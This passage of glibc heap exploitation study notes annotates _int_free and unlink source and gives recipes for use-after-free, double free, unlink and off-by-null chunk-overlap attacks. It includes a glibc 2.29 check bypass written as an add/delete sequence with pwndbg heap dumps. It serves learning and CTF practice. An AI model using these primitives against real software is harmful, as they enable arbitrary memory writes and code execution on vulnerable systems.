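                    mmap_threshold=DEFAULT_MMAP_THRESHOLD,
                    trim_threshold=DEFAULT_TRIM_THRESHOLD,
                    no_dyn_threshold=False):
    """Return (mmap_threshold, trim_threshold) after freeing an mmapped chunk."""
    if (not no_dyn_threshold
            and mmap_threshold < chunk_size <= DEFAULT_MMAP_THRESHOLD_MAX):
        # The freed chunk becomes the new mmap threshold;
        # the trim threshold follows at twice that value.
        mmap_threshold = chunk_size
        trim_threshold = 2 * mmap_threshold
    return mmap_threshold, trim_threshold
```

Under these assumptions, freeing a 1MB mmapped chunk raises the mmap threshold to 1MB, so a later malloc of 512KB is served from the heap instead of mmap.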

_int_free

static void
_int_free(mstate av, mchunkptr p, int have_lock)
{
INTERNAL_SIZE_T size; /* its size */
mfastbinptr *fb; /* associated fastbin */
mchunkptr nextchunk; /* next contiguous chunk */
INTERNAL_SIZE_T nextsize; /* its size */
int nextinuse; /* true if nextchunk is used */
INTERNAL_SIZE_T prevsize; /* size of previous contiguous chunk */
mchunkptr bck; /* misc temp for linking */
mchunkptr fwd; /* misc temp for linking */

const char *errstr = NULL;
int locked = 0;

size = chunksize(p);

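// Start with a series of sanity checks: the chunk address must not wrap around the address space and must be aligned, and the chunk size must be at least MINSIZE and aligned.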
/* Little security check which won't hurt performance: the
allocator never wrapps around at the end of the address space.
Therefore we can exclude some size values which might appear
here by accident or by "design" from some intruder. */
if (__builtin_expect((uintptr_t)p > (uintptr_t)-size, 0) || __builtin_expect(misaligned_chunk(p), 0))
{
errstr = "free(): invalid pointer";
errout:
if (!have_lock && locked)
(void)mutex_unlock(&av->mutex);
malloc_printerr(check_action, errstr, chunk2mem(p), av);
return;
}
/* We know that each chunk is at least MINSIZE bytes in size or a
multiple of MALLOC_ALIGNMENT. */
if (__glibc_unlikely(size < MINSIZE || !aligned_OK(size)))
{
errstr = "free(): invalid size";
goto errout;
}

check_inuse_chunk(av, p);


/*
If eligible, place chunk on a fastbin so it can be found
and used quickly in malloc.
*/

// If the chunk being freed is in fast bin range (and, when TRIM_FASTBINS is set, does not border the top chunk), validate the size of the next chunk: it must be larger than 2*SIZE_SZ and smaller than the arena's system_mem.
if ((unsigned long)(size) <= (unsigned long)(get_max_fast())

#if TRIM_FASTBINS
/*
If TRIM_FASTBINS set, don't place chunks
bordering top into fastbins
*/
&& (chunk_at_offset(p, size) != av->top)
#endif
)
{

if (__builtin_expect(chunk_at_offset(p, size)->size <= 2 * SIZE_SZ, 0) || __builtin_expect(chunksize(chunk_at_offset(p, size)) >= av->system_mem, 0))
{
/* We might not have a lock at this point and concurrent modifications
of system_mem might have let to a false positive. Redo the test
after getting the lock. */
if (have_lock || ({
assert(locked == 0);
mutex_lock(&av->mutex);
locked = 1;
chunk_at_offset(p, size)->size <= 2 * SIZE_SZ || chunksize(chunk_at_offset(p, size)) >= av->system_mem;
}))
{
errstr = "free(): invalid next size (fast)";
goto errout;
}
if (!have_lock)
{
(void)mutex_unlock(&av->mutex);
locked = 0;
}
}

// Set the arena's fastbin flag to record that its fast bins now hold free chunks, then locate the fast bin head that matches the size of the chunk being freed.
free_perturb(chunk2mem(p), size - 2 * SIZE_SZ);

set_fastchunks(av);
unsigned int idx = fastbin_index(size);
fb = &fastbin(av, idx);

// Double free check: compare the chunk at the head of the fast bin with the chunk being freed.
/* Atomically link P to its fastbin: P->FD = *FB; *FB = P; */
mchunkptr old = *fb, old2;
unsigned int old_idx = ~0u;
do
{
/* Check that the top of the bin is not the record we are going to add
(i.e., double free). */
if (__builtin_expect(old == p, 0))
{
errstr = "double free or corruption (fasttop)";
goto errout;
}
// Check that the chunk at the head of the fast bin belongs to the same size class as the chunk being added.
/* Check that size of fastbin chunk at the top is the same as
size of the chunk that we are adding. We can dereference OLD
only if we have the lock, otherwise it might have already been
deallocated. See use of OLD_IDX below for the actual check. */
if (have_lock && old != NULL)
old_idx = fastbin_index(chunksize(old));
p->fd = old2 = old;
} while ((old = catomic_compare_and_exchange_val_rel(fb, p, old2)) != old2);

if (have_lock && old != NULL && __builtin_expect(old_idx != idx, 0))
{
errstr = "invalid fastbin entry (free)";
goto errout;
}
}


/*
Consolidate other non-mmapped chunks as they arrive.
*/

else if (!chunk_is_mmapped(p))
{
// Take the arena lock if it is not held yet.
if (!have_lock)
{
(void)mutex_lock(&av->mutex);
locked = 1;
}

// Get the physically next chunk.
nextchunk = chunk_at_offset(p, size);

// Sanity check: the chunk being freed must not be the top chunk. Top is already free, so freeing it again would be a double free.
/* Lightweight tests: check whether the block is already the
top block. */
if (__glibc_unlikely(p == av->top))
{
errstr = "double free or corruption (top)";
goto errout;
}
// If the arena is contiguous (grown with sbrk()) and the next chunk starts at or beyond the end of the top chunk, that is, beyond the end of the arena, report an error.
/* Or whether the next chunk is beyond the boundaries of the arena. */
if (__builtin_expect(contiguous(av) && (char *)nextchunk >= ((char *)av->top + chunksize(av->top)), 0))
{
errstr = "double free or corruption (out)";
goto errout;
}

// If the size field of the next chunk does not mark the current chunk as in use, this is probably a double free.
// This is why fast bin double frees are so easy to exploit: linking a chunk into a fast bin does not clear the PREV_INUSE bit of the next chunk.
/* Or whether the block is actually not marked used. */
if (__glibc_unlikely(!prev_inuse(nextchunk)))
{
errstr = "double free or corruption (!prev)";
goto errout;
}

// Read the size of the next chunk; report an error if it is at most 2*SIZE_SZ or at least the total memory allocated to the arena (system_mem).
nextsize = chunksize(nextchunk);
if (__builtin_expect(nextchunk->size <= 2 * SIZE_SZ, 0) || __builtin_expect(nextsize >= av->system_mem, 0))
{
errstr = "free(): invalid next size (normal)";
goto errout;
}

free_perturb(chunk2mem(p), size - 2 * SIZE_SZ);

   /* consolidate backward */
// If the previous chunk is free, merge backward: add its size to the merged size and unlink it from its free list.
if (!prev_inuse(p))
{
prevsize = p->prev_size;
size += prevsize;
p = chunk_at_offset(p, -((long)prevsize));
unlink(av, p, bck, fwd);
}

// If the next chunk is not the top chunk, check whether it is in use. If it is, clear its PREV_INUSE bit so that the current chunk becomes free.
// Otherwise unlink the free next chunk from its free list and add its size to the merged chunk.
if (nextchunk != av->top)
{
/* get and clear inuse bit */
nextinuse = inuse_bit_at_offset(nextchunk, nextsize);

/* consolidate forward */
if (!nextinuse)
{
unlink(av, nextchunk, bck, fwd);
size += nextsize;
}
else
clear_inuse_bit_at_offset(nextchunk, 0);

/*
Place the chunk in unsorted chunk list. Chunks are
not placed into regular bins until after they have
been given one chance to be used in malloc.
*/
// Link the merged chunk into the unsorted bin's circular doubly linked list. If it is in large bin range, set fd_nextsize and bk_nextsize to NULL, since both fields are unused in the unsorted bin.

bck = unsorted_chunks(av);
fwd = bck->fd;
if (__glibc_unlikely(fwd->bk != bck))
{
errstr = "free(): corrupted unsorted chunks";
goto errout;
}
p->fd = fwd;
p->bk = bck;
if (!in_smallbin_range(size))
{
p->fd_nextsize = NULL;
p->bk_nextsize = NULL;
}
bck->fd = p;
fwd->bk = p;

// Set the size of the merged free chunk with PREV_INUSE set, because two adjacent chunks may never both be free. Finally write the foot of the merged chunk. The foot lives in the prev_size field of the next chunk and is only valid while the chunk is free.
set_head(p, size | PREV_INUSE);
set_foot(p, size);

check_free_chunk(av, p);
}

/*
If the chunk borders the current high end of memory,
consolidate into top
*/

// The next chunk is the top chunk: merge the current chunk into top and update top's size.
else
{
size += nextsize;
set_head(p, size | PREV_INUSE);
av->top = p;
check_chunk(av, p);
}

    /*
If freeing a large space, consolidate possibly-surrounding
chunks. Then, if the total unused topmost memory exceeds trim
threshold, ask malloc_trim to reduce top.

Unless max_fast is 0, we don't know if there are fastbins
bordering top, so we cannot tell for sure whether threshold
has been reached unless fastbins are consolidated. But we
don't want to consolidate on each free. As a compromise,
consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
is reached.
*/

// If the merged chunk is at least 64KB (0x10000) and the fast bins hold free chunks, call malloc_consolidate() to merge those chunks into the unsorted bin.
// This matters for exploitation: a freed chunk whose merged size reaches FASTBIN_CONSOLIDATION_THRESHOLD triggers malloc_consolidate.
if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD)
{
if (have_fastchunks(av))
malloc_consolidate(av);

// Main arena: if the top chunk is at least as large as the trim threshold, call systrim() to shrink the heap.
if (av == &main_arena)
{
#ifndef MORECORE_CANNOT_TRIM
if ((unsigned long)(chunksize(av->top)) >=
(unsigned long)(mp_.trim_threshold))
systrim(mp_.top_pad, av);
#endif
}
// Non-main arena: call heap_trim() to shrink its sub_heap.
else
{
/* Always try heap_trim(), even if the top chunk is not
large, because the corresponding heap might go away. */
heap_info *heap = heap_for_ptr(top(av));

assert(heap->ar_ptr == av);
heap_trim(heap, mp_.top_pad);
}
}

// Release the arena lock if it was taken in this function.
if (!have_lock)
{
assert(locked);
(void)mutex_unlock(&av->mutex);
}
}

  /*
If the chunk was allocated via mmap, release via munmap().
*/
// A chunk allocated through mmap() is released with munmap_chunk().
else
{
munmap_chunk(p);
}
}
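
The "fasttop" check in the fast bin path above only compares the chunk being freed with the current head of the bin. The Python sketch below models a single fast bin as a singly linked list to show why the sequence free(a), free(b), free(a) passes. It is a toy model under stated assumptions: the class name and addresses are invented, and the size check that malloc performs on a fast bin chunk is left out.

```python
class Fastbin:
    """Toy model of one fast bin: head pointer plus an fd table."""

    def __init__(self):
        self.head = None
        self.fd = {}          # chunk address -> fd value

    def free(self, p):
        # The only double free check on this path: p must not be the head.
        if self.head == p:
            raise RuntimeError("double free or corruption (fasttop)")
        self.fd[p] = self.head
        self.head = p

    def malloc(self):
        p = self.head
        if p is not None:
            self.head = self.fd.get(p)
        return p


# Hypothetical addresses used only for the demonstration.
chunk_a, chunk_b, target = 0x1000, 0x2000, 0x601000

fb = Fastbin()
fb.free(chunk_a)
fb.free(chunk_b)
fb.free(chunk_a)            # passes: the head is chunk_b, not chunk_a

first = fb.malloc()         # chunk_a, which is still linked in the bin
fb.fd[first] = target       # edit(chunk1->fd = target_addr)
order = [fb.malloc(), fb.malloc(), fb.malloc()]
```

After the edit, the three following allocations return chunk_b, chunk_a, and finally the target address, which matches the double free sequence in the attack notes further down.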

/* Take a chunk off a bin list */ 
// unlink p
#define unlink(AV, P, BK, FD) { \
// P is already on a doubly linked list, so its size is recorded in two places; check that the two values agree.
if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0)) \
malloc_printerr ("corrupted size vs. prev_size"); \
FD = P->fd; \
BK = P->bk; \
// Stops an attacker from getting an arbitrary write by simply overwriting the fd and bk of a free chunk.
if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) \
malloc_printerr (check_action, "corrupted double-linked list", P, AV); \
else { \
FD->bk = BK; \
BK->fd = FD; \
// The rest updates the nextsize doubly linked list that P may belong to.
if (!in_smallbin_range (chunksize_nomask (P)) \
// A NULL P->fd_nextsize means P was never inserted into the nextsize list,
// so the nextsize fields need no update.
// bk_nextsize is not checked here, which may cause problems.
&& __builtin_expect (P->fd_nextsize != NULL, 0)) { \
// Same idea as the check for small chunks.
if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0) \
|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0)) \
malloc_printerr (check_action, \
"corrupted double-linked list (not small)", \
P, AV); \
// At this point P is known to be on the nextsize list.
// Case: FD is not on the nextsize list.
if (FD->fd_nextsize == NULL) { \
// If P is the only node on the nextsize list, just take P away
// and make FD the sole node of the nextsize list.
if (P->fd_nextsize == P) \
FD->fd_nextsize = FD->bk_nextsize = FD; \
else { \
// Otherwise FD has to take P's place on the nextsize list.
FD->fd_nextsize = P->fd_nextsize; \
FD->bk_nextsize = P->bk_nextsize; \
P->fd_nextsize->bk_nextsize = FD; \
P->bk_nextsize->fd_nextsize = FD; \
} \
} else { \
// FD is already on the list, so P can simply be removed.
P->fd_nextsize->bk_nextsize = P->bk_nextsize; \
P->bk_nextsize->fd_nextsize = P->fd_nextsize; \
} \
} \
} \
}
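
The FD->bk != P || BK->fd != P check in the macro above can still be satisfied when some writable location already holds a pointer to P. The Python sketch below models memory as a dictionary and shows the classic result: after unlink, that location points 0x18 bytes before itself. The addresses and the helper name are invented for the example, and the size versus prev_size check and the nextsize handling are omitted.

```python
FD_OFF, BK_OFF = 0x10, 0x18   # offsets of fd and bk inside a chunk (64-bit)


def unlink(mem, p):
    """Simplified safe unlink on a dict that maps address -> 8-byte value."""
    fd = mem[p + FD_OFF]
    bk = mem[p + BK_OFF]
    if mem.get(fd + BK_OFF) != p or mem.get(bk + FD_OFF) != p:
        raise RuntimeError("corrupted double-linked list")
    mem[fd + BK_OFF] = bk     # FD->bk = BK
    mem[bk + FD_OFF] = fd     # BK->fd = FD


# Hypothetical layout: a global pointer at ptr_addr points to the fake chunk P.
ptr_addr = 0x602040
fake_chunk = 0x1B2F010

mem = {
    ptr_addr: fake_chunk,
    fake_chunk + FD_OFF: ptr_addr - 0x18,   # so that FD->bk is *ptr_addr == P
    fake_chunk + BK_OFF: ptr_addr - 0x10,   # so that BK->fd is *ptr_addr == P
}
unlink(mem, fake_chunk)
```

Both writes land on ptr_addr; the second one wins, so the global pointer ends up as ptr_addr - 0x18 and a later edit through it can overwrite the pointer itself.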

attack

UAF

  • Vulnerability: ptr is not set to NULL after free(ptr)
    free(chunk)
    edit(chunk->fd = target_addr)
    target[0] = 0
    target[1] = fake_size
    malloc(chunk)
    malloc(target)

double free

  • Vulnerability: UAF
  • Exploitable bins: fastbin, tcache
    # free(chunk1) here simply means releasing chunk1; the notation is shorthand
    free(chunk1)
    free(chunk2)
    free(chunk1)

    malloc(chunk1)
    edit(chunk1->fd = target_addr)
    malloc(chunk2)
    malloc(chunk1)
    malloc(chunk3)  # this allocation returns target, giving a write at an arbitrary address

unlink

  • Vulnerability: off-by-..., heap overflow
  • Exploitable bins: unsortedbin
    malloc(chunk1)
    malloc(chunk2)
    edit(chunk1->fd = 0)
    edit(chunk1->bk = chunk_size-0x10)
    edit(chunk1->bk+0x8 = chunk1_ptr_addr-0x18)
    edit(chunk1->bk+0x10 = chunk1_ptr_addr-0x10)
    edit(chunk2->prev_size = chunk_size-0x11)
    edit(chunk2->size = chunk_size-0x1)
    free(chunk2)

    #pre_chunk1->bk+0x8 = chunk1->bk+0x10 = main_arena+...
    #chunk1->chunk1_ptr_addr-0x18
    edit(chunk1_ptr_addr = got) #leak libc
    ...

Off by …

heap overlap

#chunk1,chunk2,chunk3 all allocated
#chunk1 | chunk2 | chunk3
#off by one -> chunk1
edit(chunk2->size = chunk2_size+chunk3_size+1)
free(chunk2)
malloc(chunk2+chunk3)
# arbitrary write into chunk3

#chunk2 free ; chunk3 allocated
#chunk1 | chunk2 | chunk3
#off by one -> chunk1
edit(chunk2->size = chunk2_size+chunk3_size+1)
free(chunk2)
malloc(chunk2+chunk3)
# arbitrary write into chunk3

#chunk1,chunk2,chunk3 all allocated
#chunk1 | chunk2 | chunk3
#chunk3->size%0x100 = 0
free(chunk1)
#off by null -> chunk2 ; chunk3->prev_inuse = 0
edit(chunk3->prev_size = chunk1_size+chunk2_size)
free(chunk3)
malloc(chunk1+chunk2+chunk3)
# arbitrary write into chunk2

#chunk0,chunk1,chunk2,chunk3 all allocated
#chunk0 | chunk1 | chunk2 | chunk3
free(chunk0) # leaves the size of chunk0 in the prev_size field of chunk1
#off by null -> chunk1 ; chunk2->prev_inuse = 0
edit(chunk2->prev_size = chunk0_size+chunk1_size)
...
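  1. Start with Chunk_0, Chunk_1, Chunk_2, and Chunk_3.
  2. Free Chunk_0. This leaves the size of Chunk_0 in the prev_size field of Chunk_1.
  3. Trigger the off-by-null in Chunk_1 to overwrite the prev_size field and the PREV_INUSE bit of Chunk_2.
  4. glibc follows the prev_size field of Chunk_2 and finds the free Chunk_0.
  5. glibc unlinks Chunk_0: it uses the size field of Chunk_0 to find the next chunk, which is Chunk_1, and checks that the size of Chunk_0 equals the prev_size of Chunk_1.
  6. Step 2 already left the size of Chunk_0 in the prev_size field of Chunk_1, so the check passes.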
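
The effect of the single null byte on a size field is plain arithmetic, sketched below in Python. The helper names are made up for this example. It also shows why the victim's size should be a multiple of 0x100 (the chunk3->size%0x100 = 0 remark above): otherwise the null byte changes the size itself and not only the PREV_INUSE bit.

```python
PREV_INUSE = 0x1
FLAG_MASK = 0x7


def off_by_null(size_field):
    """Zero the least significant byte of a little-endian size field."""
    return size_field & ~0xFF


def describe(size_field):
    """Summarize what the null byte does to a chunk's size field."""
    new_field = off_by_null(size_field)
    return {
        "new_field": new_field,
        "prev_inuse_cleared": bool(size_field & PREV_INUSE)
        and not (new_field & PREV_INUSE),
        "size_changed": (size_field & ~FLAG_MASK) != (new_field & ~FLAG_MASK),
    }


clean_case = describe(0x501)   # size 0x500: only PREV_INUSE is cleared
shrunk_case = describe(0x111)  # size 0x110: the chunk also shrinks to 0x100
```

In the second case the chunk appears 0x10 bytes smaller afterwards, so the layout has to account for the shifted next-chunk boundary.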

2.29

Newly added check

if (chunksize (p) != prev_size (next_chunk (p)))
malloc_printerr ("corrupted size vs. prev_size");

New construction to bypass it

add(0,0x418,b'a')
add(1,0x108,b'a')
add(2,0x438,b'a')
add(3,0x438,b'a')
add(4,0x108,b'a')
add(5,0x488,b'a')
add(6,0x428,b'a')
add(7,0x108,b'a')

delete(0)
delete(3)
delete(6)
delete(2)

add(2,0x458,b'\x00'*0x438+b'\x51\x05')
add(3,0x418,b'a')
add(0,0x418,b'0'*0x100)
add(6,0x428,b'a')

delete(0)
delete(3)
add(0,0x418,b'\x00'*8)

delete(6)
delete(5)
add(5,0x4f8,b'\x00'*0x488+p64(0x431))
add(6,0x3b8,b'a')
add(3,0x418,b'a')

delete(4)
add(4,0x108,b'\x00'*0x100+p64(0x550))

delete(5)

The walkthrough below starts from the heap state right after delete(6):

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Freed 0x73ccc601ace0 0x61107b3f7c00
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x440 Used None None
0x61107b3f7c00 0x0 0x440 Freed 0x61107b3f7290 0x61107b3f85e0
0x61107b3f8040 0x440 0x110 Used None None
0x61107b3f8150 0x0 0x490 Used None None
0x61107b3f85e0 0x0 0x430 Freed 0x61107b3f7c00 0x73ccc601ace0
0x61107b3f8a10 0x430 0x110 Used None None
delete(2) merges chunk 2 with the already freed chunk 3:

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Freed 0x73ccc601ace0 0x61107b3f85e0
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x880 Freed 0x61107b3f85e0 0x73ccc601ace0
0x61107b3f8040 0x880 0x110 Used None None
0x61107b3f8150 0x0 0x490 Used None None
0x61107b3f85e0 0x0 0x430 Freed 0x61107b3f7290 0x61107b3f77c0
0x61107b3f8a10 0x430 0x110 Used None None

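Chunk 2 is then allocated again, 0x20 bytes larger than before, so that it covers and thereby preserves the old header of chunk 3. This is the new chunk 2, and chunk 3 shrinks by 0x20: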

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Freed 0x73ccc601b0d0 0x61107b3f85e0
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Used None None
0x61107b3f7c20 0x0 0x420 Freed 0x73ccc601ace0 0x73ccc601ace0
0x61107b3f8040 0x420 0x110 Used None None
0x61107b3f8150 0x0 0x490 Used None None
0x61107b3f85e0 0x0 0x430 Freed 0x61107b3f7290 0x73ccc601b0d0
0x61107b3f8a10 0x430 0x110 Used None None

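The preserved fd and bk still point to chunks 0 and 6. In addition, the size field of the old chunk 3 header is rewritten to chunk3_size + chunk4_size (0x551 with PREV_INUSE):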

pwndbg> tele 0x61107b3f7c00
00:0000│ 0x61107b3f7c00 ◂— 0
01:0008│ 0x61107b3f7c08 ◂— 0x551
02:0010│ 0x61107b3f7c10 —▸ 0x61107b3f7290 ◂— 0
03:0018│ 0x61107b3f7c18 —▸ 0x61107b3f85e0 ◂— 0
04:0020│ 0x61107b3f7c20 ◂— 0
05:0028│ 0x61107b3f7c28 ◂— 0x421
06:0030│ 0x61107b3f7c30 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0
07:0038│ 0x61107b3f7c38 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0

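Next, all the other chunks are allocated back. The address of the old chunk 3 header (its prev_size field) ends in \x00, so an off-by-null can turn a pointer to the new chunk 3 into a pointer to the old chunk 3: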

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Used None None
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Used None None
0x61107b3f7c20 0x0 0x420 Used None None
0x61107b3f8040 0x420 0x110 Used None None
0x61107b3f8150 0x0 0x490 Used None None
0x61107b3f85e0 0x0 0x430 Used None None
0x61107b3f8a10 0x430 0x110 Used None None

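Next, make the bk pointer of chunk 0 point to the old chunk 3. Chunks 0 and 3 are freed first, which leaves the address of the new chunk 3 in chunk 0's bk: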

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Freed 0x73ccc601ace0 0x61107b3f7c20
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Used None None
0x61107b3f7c20 0x0 0x420 Freed 0x61107b3f7290 0x73ccc601ace0
0x61107b3f8040 0x420 0x110 Used None None
0x61107b3f8150 0x0 0x490 Used None None
0x61107b3f85e0 0x0 0x430 Used None None
0x61107b3f8a10 0x430 0x110 Used None None

Before the off-by-null:

pwndbg> tele 0x61107b3f7290
00:0000│ 0x61107b3f7290 ◂— 0
01:0008│ 0x61107b3f7298 ◂— 0x421
02:0010│ 0x61107b3f72a0 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0
03:0018│ 0x61107b3f72a8 —▸ 0x61107b3f7c20 ◂— 0
04:0020│ 0x61107b3f72b0 ◂— 0
05:0028│ 0x61107b3f72b8 ◂— 0

After the off-by-null:

00:0000│     0x61107b3f7290 ◂— 0
01:0008│ 0x61107b3f7298 ◂— 0x421
02:0010│ r9 0x61107b3f72a0 ◂— 0
03:0018│ 0x61107b3f72a8 —▸ 0x61107b3f7c00 ◂— 0
04:0020│ 0x61107b3f72b0 ◂— 0
05:0028│ 0x61107b3f72b8 ◂— 0

bk now points to the old chunk 3:

pwndbg> tele 0x61107b3f7c00
00:0000│ 0x61107b3f7c00 ◂— 0
01:0008│ 0x61107b3f7c08 ◂— 0x551
02:0010│ 0x61107b3f7c10 —▸ 0x61107b3f7290 ◂— 0
03:0018│ 0x61107b3f7c18 —▸ 0x61107b3f85e0 ◂— 0
04:0020│ 0x61107b3f7c20 ◂— 0
05:0028│ 0x61107b3f7c28 ◂— 0x421
06:0030│ 0x61107b3f7c30 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0
07:0038│ 0x61107b3f7c38 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0

Next, make the fd of chunk 6 point to the old chunk 3.

First free chunks 6 and 5 so that they merge:

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Used None None
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Used None None
0x61107b3f7c20 0x0 0x420 Freed 0x73ccc601ace0 0x61107b3f8150
0x61107b3f8040 0x420 0x110 Used None None
0x61107b3f8150 0x0 0x8c0 Freed 0x61107b3f7c20 0x73ccc601ace0
0x61107b3f8a10 0x8c0 0x110 Used None None

Before the off-by-null:

pwndbg> tele 0x61107b3f8150+0x490
00:0000│ 0x61107b3f85e0 ◂— 0
01:0008│ 0x61107b3f85e8 ◂— 0x431
02:0010│ 0x61107b3f85f0 —▸ 0x61107b3f7c20 ◂— 0
03:0018│ 0x61107b3f85f8 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0
04:0020│ 0x61107b3f8600 ◂— 0
... ↓ 3 skipped

After the off-by-null:

pwndbg> tele 0x61107b3f8150+0x490
00:0000│ 0x61107b3f85e0 ◂— 0
01:0008│ 0x61107b3f85e8 ◂— 0x431
02:0010│ 0x61107b3f85f0 —▸ 0x61107b3f7c00 ◂— 0
03:0018│ 0x61107b3f85f8 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0
04:0020│ 0x61107b3f8600 ◂— 0
... ↓ 3 skipped

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Used None None
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Used None None
0x61107b3f7c20 0x0 0x420 Freed 0x73ccc601b0d0 0x73ccc601b0d0
0x61107b3f8040 0x420 0x110 Used None None
0x61107b3f8150 0x0 0x500 Used None None
0x61107b3f8650 0x0 0x3c0 Freed 0x73ccc601ace0 0x73ccc601ace0
0x61107b3f8a10 0x3c0 0x110 Used None None

fd now points to the old chunk 3, which completes the forged doubly linked list:

pwndbg> x/6gx 0x61107b3f7290
0x61107b3f7290: 0x0000000000000000 0x0000000000000421
0x61107b3f72a0: 0x0000000000000000 0x000061107b3f7c00
0x61107b3f72b0: 0x0000000000000000 0x0000000000000000
pwndbg> x/6gx 0x61107b3f7c00
0x61107b3f7c00: 0x0000000000000000 0x0000000000000551
0x61107b3f7c10: 0x000061107b3f7290 0x000061107b3f85e0
0x61107b3f7c20: 0x0000000000000000 0x0000000000000421
pwndbg> x/6gx 0x61107b3f85e0
0x61107b3f85e0: 0x0000000000000000 0x0000000000000431
0x61107b3f85f0: 0x000061107b3f7c00 0x000073ccc601ace0
0x61107b3f8600: 0x0000000000000000 0x0000000000000000

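Next, turn chunk 4 into a UAF. The off-by-null from chunk 4 clears the PREV_INUSE bit of chunk 5 and sets its prev_size to the combined size of chunks 3 and 4. Freeing chunk 5 then merges the old chunk 3, chunk 4, and chunk 5 into one large free chunk, while chunk 4 remains usable.

Before the off-by-null: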

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Used None None
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Used None None
0x61107b3f7c20 0x0 0x420 Used None None
0x61107b3f8040 0x420 0x110 Used None None
0x61107b3f8150 0x0 0x500 Used None None
0x61107b3f8650 0x0 0x3c0 Used None None
0x61107b3f8a10 0x3c0 0x110 Used None None

After the off-by-null:

pwndbg> tele 0x61107b3f8150
00:0000│ 0x61107b3f8150 ◂— 0x550
01:0008│ 0x61107b3f8158 ◂— 0x500
02:0010│ 0x61107b3f8160 ◂— 0
... ↓ 5 skipped

Heap state:

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Used None None
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Used None None
0x61107b3f7c20 0x0 0x420 Used None None
0x61107b3f8040 0x420 0x110 Freed 0x0 0x0
0x61107b3f8150 0x550 0x500 Used None None
0x61107b3f8650 0x0 0x3c0 Used None None
0x61107b3f8a10 0x3c0 0x110 Used None None

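Last step: delete chunk 5. Because its PREV_INUSE bit is 0, glibc follows prev_size back to the old chunk 3 header and then follows its fd and bk to chunks 0 and 6. Chunk 0's bk and chunk 6's fd both point back to the old chunk 3, so the doubly linked list check passes. The newly added check compares the size of the old chunk 3 with the prev_size of chunk 5: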

pwndbg> tele 0x61107b3f7c00
00:0000│ 0x61107b3f7c00 ◂— 0
01:0008│ 0x61107b3f7c08 ◂— 0x551
02:0010│ 0x61107b3f7c10 —▸ 0x61107b3f7290 ◂— 0
03:0018│ 0x61107b3f7c18 —▸ 0x61107b3f85e0 ◂— 0
04:0020│ 0x61107b3f7c20 ◂— 0
05:0028│ 0x61107b3f7c28 ◂— 0x421
06:0030│ 0x61107b3f7c30 —▸ 0x73ccc6010061 ◂— 0xd00e4201c80ef002
07:0038│ 0x61107b3f7c38 —▸ 0x73ccc601b0d0 (main_arena+1104) —▸ 0x73ccc601b0c0 (main_arena+1088) —▸ 0x73ccc601b0b0 (main_arena+1072) —▸ 0x73ccc601b0a0 (main_arena+1056) ◂— ...
pwndbg> tele 0x61107b3f7c00+0x550
00:0000│ 0x61107b3f8150 ◂— 0x550
01:0008│ 0x61107b3f8158 ◂— 0x500
02:0010│ 0x61107b3f8160 ◂— 0

Both values are 0x550, so the check passes and delete(5) merges the chunks:

pwndbg> parseheap
addr prev size status fd bk
0x61107b3f7000 0x0 0x290 Used None None
0x61107b3f7290 0x0 0x420 Used None None
0x61107b3f76b0 0x420 0x110 Used None None
0x61107b3f77c0 0x0 0x460 Freed 0x0 0x0
Corrupt ?! (size == 0) (0x61107b3f7c20)
pwndbg> tele 0x61107b3f7c00
00:0000│ 0x61107b3f7c00 ◂— 0
01:0008│ 0x61107b3f7c08 ◂— 0xa51 /* 'Q\n' */
02:0010│ 0x61107b3f7c10 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0
03:0018│ 0x61107b3f7c18 —▸ 0x73ccc601ace0 (main_arena+96) —▸ 0x61107b3f8b20 ◂— 0
04:0020│ 0x61107b3f7c20 ◂— 0
05:0028│ 0x61107b3f7c28 ◂— 0
06:0030│ 0x61107b3f7c30 —▸ 0x73ccc6010061 ◂— 0xd00e4201c80ef002
